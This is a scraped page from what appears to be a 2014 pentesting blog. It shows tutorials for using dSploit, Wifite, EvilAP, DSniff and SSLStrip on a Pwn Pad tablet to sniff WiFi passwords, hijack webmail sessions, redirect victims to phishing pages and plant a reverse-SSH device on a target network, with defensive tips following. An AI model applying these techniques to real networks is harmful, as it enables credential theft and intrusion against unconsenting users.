<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNuFhXRBHlg_dO9cVPurTW17j4bRrkVrc26BUuGzbYdx7yFlHd4I0XFMi9W4593I-ATd3-HQB1rsi-8k9y74LYTH9FTRuGF0NuwAUOJzGd30l5LOJ2xR9dZz3Dhww_82zQgWAA0T6uxQ9/s1600/dsploit_01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNuFhXRBHlg_dO9cVPurTW17j4bRrkVrc26BUuGzbYdx7yFlHd4I0XFMi9W4593I-ATd3-HQB1rsi-8k9y74LYTH9FTRuGF0NuwAUOJzGd30l5LOJ2xR9dZz3Dhww_82zQgWAA0T6uxQ9/s1600/dsploit_01.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the following submenu, there are tons of options, but the best features are in the MITM section. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbMoXPVLHUVWnPoaPOLx4EmOT2NqhxyR0a-1jMD-s-wmWitONK63YdS8w1VWHXPumV0LLK3ozfbBeYXVNfg1jlRd9EkPW57pBukin58oKuTps-R-etuKtQIQYfWAD_nlmnFJA5GMpfihb/s1600/dsploit_02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbMoXPVLHUVWnPoaPOLx4EmOT2NqhxyR0a-1jMD-s-wmWitONK63YdS8w1VWHXPumV0LLK3ozfbBeYXVNfg1jlRd9EkPW57pBukin58oKuTps-R-etuKtQIQYfWAD_nlmnFJA5GMpfihb/s1600/dsploit_02.png" width="251" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">Stealthiness warning: in some cases, I received the following popup on the victim Windows:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2KyJZuUJB9ptSkQuOxT4GR371jfXAEZVwa57_7NGSWDxRcxuN_L5oeQVA5b80YAN1rOH0lhaYu84l2NaI5bx2B6nK7esQU_pN3rJNRfjfox2WTSqPHwSJ05ye6oOXcLA8xbLB4cbORGy/s1600/attack1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2KyJZuUJB9ptSkQuOxT4GR371jfXAEZVwa57_7NGSWDxRcxuN_L5oeQVA5b80YAN1rOH0lhaYu84l2NaI5bx2B6nK7esQU_pN3rJNRfjfox2WTSqPHwSJ05ye6oOXcLA8xbLB4cbORGy/s1600/attack1.png" width="320" /></a></div>
<div style="text-align: justify;">
<br />
This is what we have under the MITM submenu:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2oPClAtkObUo9VynKrnOVPf6Gqgb_A47kTbzPid_K-pIdlpXw5zWm_PGGPHHQ7IhjoYrA61E5mpmOQDLwVXM70jKqzLlETm8eYhz_EGJlaQmnoOOQH6OM5JrP_yHNWDeYgqGTPZ9BDGG1/s1600/dsploit_03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2oPClAtkObUo9VynKrnOVPf6Gqgb_A47kTbzPid_K-pIdlpXw5zWm_PGGPHHQ7IhjoYrA61E5mpmOQDLwVXM70jKqzLlETm8eYhz_EGJlaQmnoOOQH6OM5JrP_yHNWDeYgqGTPZ9BDGG1/s1600/dsploit_03.png" width="302" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3>
Password sniffing</h3>
<div style="text-align: justify;">
For example, let's start with the <b>Password Sniffer</b>. It is the same as EvilAP and DSniff in my previous post. With the same results for the popular Hungarian webmail with the default secure login checkbox turned off. Don't forget, this is not an Open WiFi network, but one with WPA2 protection!<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyDLLzVpmpMVzVuEJNZ7EpP7IrLmE9asUqUIyCLMXO53CC4YSs1O3FfjpebI0RIMMjdQ0aGrOrd1t-iwoRmR4tSNYDkr0AixSshyphenhyphenG0rz9PzwI2aCGmIYtyepcfh5FFFhc1iIUruIW0ExIM/s1600/freemail_password.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyDLLzVpmpMVzVuEJNZ7EpP7IrLmE9asUqUIyCLMXO53CC4YSs1O3FfjpebI0RIMMjdQ0aGrOrd1t-iwoRmR4tSNYDkr0AixSshyphenhyphenG0rz9PzwI2aCGmIYtyepcfh5FFFhc1iIUruIW0ExIM/s1600/freemail_password.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3>
Session hijack</h3>
<div style="text-align: justify;">
Now let's assume that the victim is very security-aware and he checks the secure login checkbox. Another cause can be that the victim already logged in, long before we started to attack. The <b>session hijacking </b>function is similar to the <a href="http://codebutler.com/firesheep/">Firesheep</a> tool, but it works with every website where the session cookies are sent in clear text, and there is no need for any additional support.<br />
<br /></div>
<div style="text-align: justify;">
In a session hijacking attack (also called "sidejacking"), after the victim browser sends the authentication cookies in clear text, DSploit copies these cookies into its own browser, and opens the website with the same cookies, which results in successful login most of the time. Let's see session hijacking in action!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here, we can see that the session cookies have been sniffed from the air:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4hyI7xJdbHY4ENsqEgMnDyRwd_-WKflUSS8wZVW-09LOp1ujq-VsVGsxqca0VFnq77VZA_w0DigAJ8dvaBZDEyeqDPc1c6m4tlPJkQfo8R1U8W_N29BmiBzuOCsUwDLzWMSXY4g0xcRwp/s1600/freemail_session.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4hyI7xJdbHY4ENsqEgMnDyRwd_-WKflUSS8wZVW-09LOp1ujq-VsVGsxqca0VFnq77VZA_w0DigAJ8dvaBZDEyeqDPc1c6m4tlPJkQfo8R1U8W_N29BmiBzuOCsUwDLzWMSXY4g0xcRwp/s1600/freemail_session.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's select that session, and be amazed that we logged into the user's webmail session.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWRTqTND5Rk-70tcjsOxMEF9x6If01qJ51e8nIVHNMBVSMOS2HlsGX_jMk6txu4zEDwEKq1MJxPMlgAg5kwKRmfJrCyM1etdHXGNikA7p2or6Eekl9dHbAjaeGVa59jWHdUyMaAcBl2yg/s1600/freemail_loggedin.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWRTqTND5Rk-70tcjsOxMEF9x6If01qJ51e8nIVHNMBVSMOS2HlsGX_jMk6txu4zEDwEKq1MJxPMlgAg5kwKRmfJrCyM1etdHXGNikA7p2or6Eekl9dHbAjaeGVa59jWHdUyMaAcBl2yg/s1600/freemail_loggedin.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz9FI2x-_FLIsVIZNfXsfhUpuCZl6YEucfgJQdZj4c9EWgTZGJCHN-P-ujfBU6MmLNcbRPrRUfecIAsB3rgGA_hQV5URawyvVtlbUEZOof0RU6yyh5Q3g6oX0odKvto9UhXdvN0cYQmZiW/s1600/much-hacking.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz9FI2x-_FLIsVIZNfXsfhUpuCZl6YEucfgJQdZj4c9EWgTZGJCHN-P-ujfBU6MmLNcbRPrRUfecIAsB3rgGA_hQV5URawyvVtlbUEZOof0RU6yyh5Q3g6oX0odKvto9UhXdvN0cYQmZiW/s1600/much-hacking.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<h3>
Redirect traffic</h3>
This feature can be used both for fun or profit. For fun, you can redirect all the victim traffic to http://www.kittenwar.com/. For-profit, you can redirect your victim to phishing pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8i_95LO8hDdycZ94y6aKkMFNMtYQA_jLYQeDPk4KTy98ZpoROJ8xxazWYUMii6ni13N45mWg573nqU0T3KIk6M-xN1HQPMuBWcleDTk3Mk40ajkZ907jaMiTV78R6qSHtyqm-yyLr7nA/s1600/kittenwar.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8i_95LO8hDdycZ94y6aKkMFNMtYQA_jLYQeDPk4KTy98ZpoROJ8xxazWYUMii6ni13N45mWg573nqU0T3KIk6M-xN1HQPMuBWcleDTk3Mk40ajkZ907jaMiTV78R6qSHtyqm-yyLr7nA/s1600/kittenwar.png" width="320" /></a></div>
<br />
<h3>
Replace images, videos</h3>
I think this is just for fun here. Endless Rick Rolling possibilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmogIB821KWR2YU39ik5k2kLlDhJB6bNMb11FPFkMb_Ht3HWomZrfFVN4vR15w6QxYOa0x15P5aRGzUHaZEzXWZQo0QegUr4by0RlT3TPVmgDgcwV9mwxr7jHh91qD1GmYK_cHeSFroSe/s1600/rickrolled3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmogIB821KWR2YU39ik5k2kLlDhJB6bNMb11FPFkMb_Ht3HWomZrfFVN4vR15w6QxYOa0x15P5aRGzUHaZEzXWZQo0QegUr4by0RlT3TPVmgDgcwV9mwxr7jHh91qD1GmYK_cHeSFroSe/s1600/rickrolled3.jpg" width="320" /></a></div>
<br />
<h3>
Script injection</h3>
This is mostly for profit. client-side injection, drive-by-exploits, endless possibilities.<br />
<br />
<h3>
Custom filter</h3>
If you are familiar with ettercap, this has similar functionalities (but dumber), with string or regex replacements. E.g. you can replace the news, stock prices, which pizza the victim ordered, etc. If you know more fun stuff here, please leave a comment (only HTTP scenario - e.g. attacking Facebook won't work).<br />
<br />
<h3>
Additional fun (not in DSploit) - SSLStrip </h3>
From the MITM section of DSploit, I really miss the SSLStrip functionality. Luckily, it is built into the Pwn Pad. With the help of SSLStrip, we can remove the references to HTTPS links in the clear text HTTP traffic, and replace those with HTTP. So even if the user checks the secure login checkbox at freemail.hu, the password will be sent in clear text - thus it can be sniffed with DSniff.<br />
<br />
HTML source on the client-side without SSLstrip:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3LLx_6CK0Uaww4yc4LCQEOMNvcRQc4yHEnKVQo2EMNTuj-kUWrSFtYRan9r3cqUpw5lqRVkh6IbN77MYQwoxzQ1JVEKrQIkcy1b9FphvqLI-6tCqZQiBsscyFTF_8hHObD7T0MZmOHX9/s1600/sslstrip_freemail2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3LLx_6CK0Uaww4yc4LCQEOMNvcRQc4yHEnKVQo2EMNTuj-kUWrSFtYRan9r3cqUpw5lqRVkh6IbN77MYQwoxzQ1JVEKrQIkcy1b9FphvqLI-6tCqZQiBsscyFTF_8hHObD7T0MZmOHX9/s1600/sslstrip_freemail2.png" width="400" /></a></div>
<br />
HTML source on the client-side with SSL strip:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJF7T63nR1gRcomY8wbhrBPKd7j_jH9qzET_CD2rzf0KTN0i8rpitve7f2Wc0OkjYFLrFSuMVPnTwJE2sRVrE74Svz89cX4OmtYc1Y287xvvIoLMKHbn8dFX_LAvOuDZJC4TSkKxJhG1_/s1600/sslstrip_freemail.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJF7T63nR1gRcomY8wbhrBPKd7j_jH9qzET_CD2rzf0KTN0i8rpitve7f2Wc0OkjYFLrFSuMVPnTwJE2sRVrE74Svz89cX4OmtYc1Y287xvvIoLMKHbn8dFX_LAvOuDZJC4TSkKxJhG1_/s1600/sslstrip_freemail.png" width="400" /></a></div>
<br />
With EvilAP, SSLStrip, and DSniff, the password can be stolen. No hacking skillz needed.<br />
<h3>
Lessons learned here</h3>
If you are a website operator where you allow your users to login, always:<br />
<ol>
<li>Use HTTPS with a trusted certificate, and redirect all unencrypted traffic to HTTPS ASAP</li>
<li>Mark the session cookies with the <a href="https://www.owasp.org/index.php/SecureFlag">secure flag</a></li>
<li>Use <a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS</a> to prevent SSLStrip attacks</li>
</ol>
<div>
If you are a user:</div>
<ol>
<li>Don't trust sites with your confidential data if the above points are not fixed. Choose a more secure alternative</li>
<li>Use HTTPS everywhere plugin</li>
<li>For improved security, use VPN</li>
</ol>
<div style="text-align: justify;">
Because hacking has never been so easy before.<br />
And last but not least, if you like the DSploit project, don't forget to <a href="http://dsploit.net/donate/">donate</a> them!</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-79053686469115403772014-04-22T14:16:00.001+02:002019-10-08T15:56:42.739+02:00WiFi hacking on tablets<div style="text-align: justify;">
<a href="http://jumpespjump.blogspot.be/p/disclaimer.html" target="_blank">Disclaimer</a>: Don't hack anything where you don't have the authorization to do so. Stay legal.<br />
<br />
Ever since I bought my first Android device, I wanted to use the device for WEP cracking. Not because I need it, but I want it :) After some googling, I read that you can't use your WiFi chipset for packet injection, and I forgot the whole topic.<br />
<br />
After a while, I read about hacking on tablets (this was around a year ago), and my first opinion was: </div>
<div style="text-align: justify;">
"This is stupid, lame, and the usage of that can be very limited".<br />
<br /></div>
<div style="text-align: justify;">
After playing one day with it, my opinion just changed: </div>
<div style="text-align: justify;">
"This is stupid, lame, the usage is limited, but when it works, it is really funny :-)"<br />
<br />
At the beginning I looked at the Pwn Pad as a device that can replace a pentest workstation, working at the attacker side. Boy was I wrong. Pwn Pad should be used as a pentest device deployed at the victim's side!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You have the following options:</div>
<div style="text-align: justify;">
<ol>
<li>You have 1095 USD + VAT + shipping to buy <a href="https://www.pwnieexpress.com/penetration-testing-vulnerability-assessment-products/sensors/pwn-pad-2014/">this</a> Pwn Pad</li>
<li>You have around 200 USD to buy an old Nexus 7 tablet, a USB OTG cable, a USB WiFi dongle (e.g. TP-Link Wireless TL-WN722N USB adapter works).</li>
</ol>
</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsGytwRJsNojC55MWDntOoLODAL4arVETyxKJIS3SwGrDQnb4-8HMEbDHrSKnNIBQXQ7alH66KcRrXXRYF7sYA4oII-F_nnHOlWl0r3Iw_-Q2HVWcrNyECw-XdJS0gNR4zXqbu-s4pVHY/s1600/2014-04-20+10.48.29_cleaned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsGytwRJsNojC55MWDntOoLODAL4arVETyxKJIS3SwGrDQnb4-8HMEbDHrSKnNIBQXQ7alH66KcRrXXRYF7sYA4oII-F_nnHOlWl0r3Iw_-Q2HVWcrNyECw-XdJS0gNR4zXqbu-s4pVHY/s1600/2014-04-20+10.48.29_cleaned.jpg" width="240" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my example, I bought a used, old 2012 Nexus WiFi. Originally I bought this to play with different custom Android ROMs, and play with rooted applications. After a while, I found this Pwn Pad hype again and gave it a shot.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The <a href="https://www.pwnieexpress.com/support/downloads/">Pwn Pad community edition</a> has an <a href="http://sourceforge.net/projects/pwnpad/files/?source=navbar">easy-to-use installer</a>, with a proper <a href="http://www.pwnieexpress.com/wp-content/uploads/2013/12/PwnPadCommunityEdition-FactoryImageInstallationGuide.pdf">installation description</a>. Don't forget to backup everything from your tablet before installing Pwn Pad on it!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I don't want to repeat the install guide, it is as easy as ABC. I booted a Ubuntu Live CD, installed adb and fastboot, and it was ready-to-roll. I have not measured the time, but the whole process was around 20 minutes.<br />
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihmbDCwjpb4e_lVVQOpfVk5QryxI4sq09zbr86SUyWXcfVO1eUn_YNr2l40tird-t6_ZWTSisiUcmAHXeSbu1rdXAw0xNmcv-jy32mUe-7U9uxWIFHX77y8zB8FMeh1vcDAMyjRYTqKYYO/s1600/Screenshot_2014-04-17-13-25-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihmbDCwjpb4e_lVVQOpfVk5QryxI4sq09zbr86SUyWXcfVO1eUn_YNr2l40tird-t6_ZWTSisiUcmAHXeSbu1rdXAw0xNmcv-jy32mUe-7U9uxWIFHX77y8zB8FMeh1vcDAMyjRYTqKYYO/s1600/Screenshot_2014-04-17-13-25-13.png" width="250" /></a></div>
<br /></div>
<div style="text-align: justify;">
The internal WiFi chipset can be used to sniff traffic or even ARP poisoning for active MiTM. But in my case, I was not able to use the internal chipset for packet injection, which means you can't use it for WEP cracking, WPA disauth, etc. This is where the external USB WiFi comes handy. And this is why we need the Pwn Pad Android ROM, and can't use an average ROM.</div>
<div style="text-align: justify;">
<br />
There are two things where Pwn Pad really rocks. The first one is the <u>integrated drivers for</u> the external WiFi with monitor mode and <u>packet injection</u> capabilities. The second cool thing is the <u>chroot wrapper</u> around the Linux hacking tools. Every hacking tool has a start icon, so it feels like it is a native Android application, although it is running in a <u>chroot Kali</u> environment.<br />
<br /></div>
<div style="text-align: justify;">
<h3>
Wifite</h3>
</div>
<div style="text-align: justify;">
The first recommended app is Wifite. Think of it as a wrapper around the aircrack - airmon - airodump suite. My biggest problem with WEP cracking was that I had to remember a bunch of commands, or have the WEP cracking manual with me every time I have to crack it. It was overcomplicated. But thanks to Wifite, that is past.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to crack a WEP key, you have to:<br />
<ol>
<li>Start the Wifite app</li>
<li>Choose your adapter (the USB WiFi)<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfSykxqqYGa92wH6L-qA2bIDOU8A4_JvCNLxkR73UKgfJsw8Wiy4faCCUrNFVljStPpgG9Ayi5IvK0G4iECkESQpx7EHa9Um093B351qnXTHEv5fsCUzNDlgMCplnQSiV6cs2a4ACvocL/s1600/Screenshot_2014-04-17-13-47-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfSykxqqYGa92wH6L-qA2bIDOU8A4_JvCNLxkR73UKgfJsw8Wiy4faCCUrNFVljStPpgG9Ayi5IvK0G4iECkESQpx7EHa9Um093B351qnXTHEv5fsCUzNDlgMCplnQSiV6cs2a4ACvocL/s1600/Screenshot_2014-04-17-13-47-00.png" width="320" /></a></div>
</li>
<li>Choose the target network (wep_lan in the next example)</li>
<li>Wait for a minute </li>
<li>PROFIT!</li>
</ol>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2OhA-f8l0SCltHRpOnjYMy29MSDSFdv8CzK1vlB2_ok0G1NIcaOeRMh4fdPIN6E1olGiv0UP2w2lMIENf_d7tsIU7PK27h1PPbqzBZthq3WpPXzu2_bzjIGINOvsiIzdb0SpQCo33sVJU/s1600/p.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2OhA-f8l0SCltHRpOnjYMy29MSDSFdv8CzK1vlB2_ok0G1NIcaOeRMh4fdPIN6E1olGiv0UP2w2lMIENf_d7tsIU7PK27h1PPbqzBZthq3WpPXzu2_bzjIGINOvsiIzdb0SpQCo33sVJU/s1600/p.png" width="297" /></a></div>
<br /></div>
<div style="text-align: justify;">
<h3>
SSH reverse shell</h3>
This is one of the key functionalities of the Pwn Pad. You deploy the tablet at the Victim side, and let the tablet connect to your server via (tunneled) SSH.<br />
<br />
The basic concept of the reverse shells are that an SSH tunnel is established between the Pwn Pad tablet (client) and your external SSH server (either directly or encapsulated in other tunneling protocol), and remote port forward is set up, which means on your SSH server you connect to a localport which is forwarded to the Pwn Pad and handled by the Pwn Pad SSH server.<br />
<br />
I believe the best option would be to use the reverse shell over 3G, and let the tablet connect to the victim network through Ethernet or WiFi. But your preference might vary. The steps for reverse shells are again well documented in the <a href="http://www.pwnieexpress.com/wp-content/uploads/2013/12/PwnieExpressUserManual-PwnPad.pdf">documentation</a>, except that by default you also have to start the SSH server on the Pwn Pad. It is not hard, there is an app for that ;-) On your external SSH server you might need to install stunnel and ptunnel if you are not using Kali. The following output shows what you can see on your external SSH server after successful reverse shell.<br />
<br />
<pre class="prettyprint bash">root@myserver:/home/ubuntu# ssh -p 3333 pwnie@localhost
The authenticity of host '[localhost]:3333 ([127.0.0.1]:3333)' can't be established.
ECDSA key fingerprint is 14:d4:67:04:90:30:18:a4:7a:f6:82:04:e0:3c:c6:dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:3333' (ECDSA) to the list of known hosts.
pwnie@localhost's password:
_____ ___ _ ___ ___ _____ _____ ___ ___ ___ ___
| _ \ \ / / \| |_ _| __| | __\ \/ / _ \ _ \ __/ __/ __|
| _/\ \/\/ /| .` || || _| | _| > <| _/ / _|\__ \__ \
|_| \_/\_/ |_|\_|___|___| |___/_/\_\_| |_|_\___|___/___/
Release Version: 1.5.5
Release Date: 2014-01-30
Copyright 2014 Pwnie Express. All rights reserved.
By using this product you agree to the terms of the Rapid Focus
Security EULA: http://pwnieexpress.com/pdfs/RFSEULA.pdf
This product contains both open source and proprietary software.
Proprietary software is distributed under the terms of the EULA.
Open source software is distributed under the GNU GPL:
http://www.gnu.org/licenses/gpl.html
pwnie@localhost:~$
</pre>
<div>
<br />
Now you have a shell on a machine that is connected to the victim network. Sweet :) Now Metasploit really makes sense on the tablet, and all other command-line tools.<br />
<h3>
</h3>
<h3>
EvilAP and DSniff</h3>
Start EvilAP (it is again a wrapper around airobase), choose interface (for me the Internal Nexus Wifi worked), enter an SSID (e.g freewifi), enter channel, choose whether force all clients to connect to you or just those who really want to connect to you, and start.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiHxArzvi53vGo8EM1yydv9GpFFkYOkmcAJvIosBxy3nq4YJSdCf26ZI93pGpV1XwPqvWNASGr-UGhTMJ1BUXlsjSIl0cn0GHpvS2d7QYWSrq0igC_n7p-Btwz8NbLNx-3_Bt4IjpC5_H/s1600/evilap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiHxArzvi53vGo8EM1yydv9GpFFkYOkmcAJvIosBxy3nq4YJSdCf26ZI93pGpV1XwPqvWNASGr-UGhTMJ1BUXlsjSIl0cn0GHpvS2d7QYWSrq0igC_n7p-Btwz8NbLNx-3_Bt4IjpC5_H/s1600/evilap.png" width="250" /></a></div>
<br />
The next step is to start DSniff, choose interface at0, and wait :) In this example, I used a popular Hungarian webmail, which has a checkbox option for "secure" login (with default off). There are sooo many problems with this approach, e.g. you can't check the certificate before connecting, and the login page is delivered over HTTP, so one can disable the secure login checkbox seamlessly in the background, etc. In this case, I left the "secure" option on default off.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghusyD0tYBpQdbP_u3Zlzx4AGNkUVN6jTCLNTpbpdRzXqp7tdtF0nZLc9CU7HFKZr3Xzm9yOQNxAJTHfZecwAePzzd1qOrjLOPxkCPxMUH-nAo1BS_Sfk9INEZf70mw_quQL8-mBhJV4Cf/s1600/dsniff_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghusyD0tYBpQdbP_u3Zlzx4AGNkUVN6jTCLNTpbpdRzXqp7tdtF0nZLc9CU7HFKZr3Xzm9yOQNxAJTHfZecwAePzzd1qOrjLOPxkCPxMUH-nAo1BS_Sfk9INEZf70mw_quQL8-mBhJV4Cf/s1600/dsniff_1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv3-XYIQ7YXd1LlEN6ZWiD8cEjav907DnrHDpi4SYRBmZFCH1frf2mX0nN-txj0rzAYlqwzTgxQEcf1QkmOMG_mzvKyJm5X-PYZSq3sihiL8uwI1691wO6KXPsXe71yk4UVNc1e3oN2jEI/s1600/dsniff2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv3-XYIQ7YXd1LlEN6ZWiD8cEjav907DnrHDpi4SYRBmZFCH1frf2mX0nN-txj0rzAYlqwzTgxQEcf1QkmOMG_mzvKyJm5X-PYZSq3sihiL8uwI1691wO6KXPsXe71yk4UVNc1e3oN2jEI/s1600/dsniff2.png" width="320" /></a></div>
<br />
In the next tutorial, I'm going to show my next favorite app, DSploit ;)<br />
<br />
<h3>
Lessons learned</h3>
Hacking has been never so easy before<br />
In a home environment, only use WPA2 PSK<br />
Choose a long, nondictionary passphrase as the password for WPA2<br />
Don't share your WiFi passwords with people you don't trust, or change it when they don't need it anymore<br />
Don't let your client device auto-connect to WiFi stations, even if the SSID looks familiar</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I believe during an engagement a Pwn Plug has better "physical cloaking" possibilities, but playing with the Pwn Pad Community Edition really gave me fun moments.<br />
<br />
And last but not least I would like to thank to the Pwn Pad developers for releasing the Community Edition!<br />
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-65344089444770583952014-04-01T11:09:00.000+02:002019-10-08T15:57:28.026+02:00BYOPPP - Build your own privacy protection proxy<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
I have read a <a href="http://lifehacker.com/5978098/turn-a-raspberry-pi-into-a-personal-vpn-for-secure-browsing-anywhere-you-go/all">blog post</a>, where you can build your own privacy proxy server built on Raspberry PI. The post got me thinking about how I can use this to protect my privacy on my Android phone, and also get rid of those annoying ads. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Since I own a Samsung Galaxy S3 LTE with Android 4.3 (with a HW based Knox counter), rooting the phone now means you <a href="http://forum.xda-developers.com/galaxy-s3/general/to-root-s3-lte-android-4-3-t2567118">break Knox, and loose warranty</a>. Past the point of no return ...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This means I have to solve this without root. Luckily newer Androids support VPN without rooting, but setting a mandatory system-wide proxy is still not possible without root. </div>
<div style="text-align: justify;">
But thanks to some iptables magic and Privoxy, this is not a problem anymore :) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The ingredients to build your own privacy protection proxy:</div>
<ul>
<li style="text-align: justify;">One (or more) cheap VPS server(s)</li>
<li style="text-align: justify;">a decent VPN program</li>
<li style="text-align: justify;">Privoxy</li>
<li style="text-align: justify;">iptables</li>
</ul>
<ul>
</ul>
<h2>
VPS server</h2>
<div style="text-align: justify;">
To get the cheap VPS server, I recommend using Amazon EC2, but choose whatever you like. The micro instance is very cheap (<a href="http://aws.amazon.com/free/">or even free</a>), and has totally enough resources for this task. I'm using the Ubuntu free tier now and it works like a charm. And last but not least Amazon has two-factor authentication! You can set up an Ubuntu server under 10 minutes. Use the AWS region nearest to you, e.g. I choose EU - Ireland.<br />
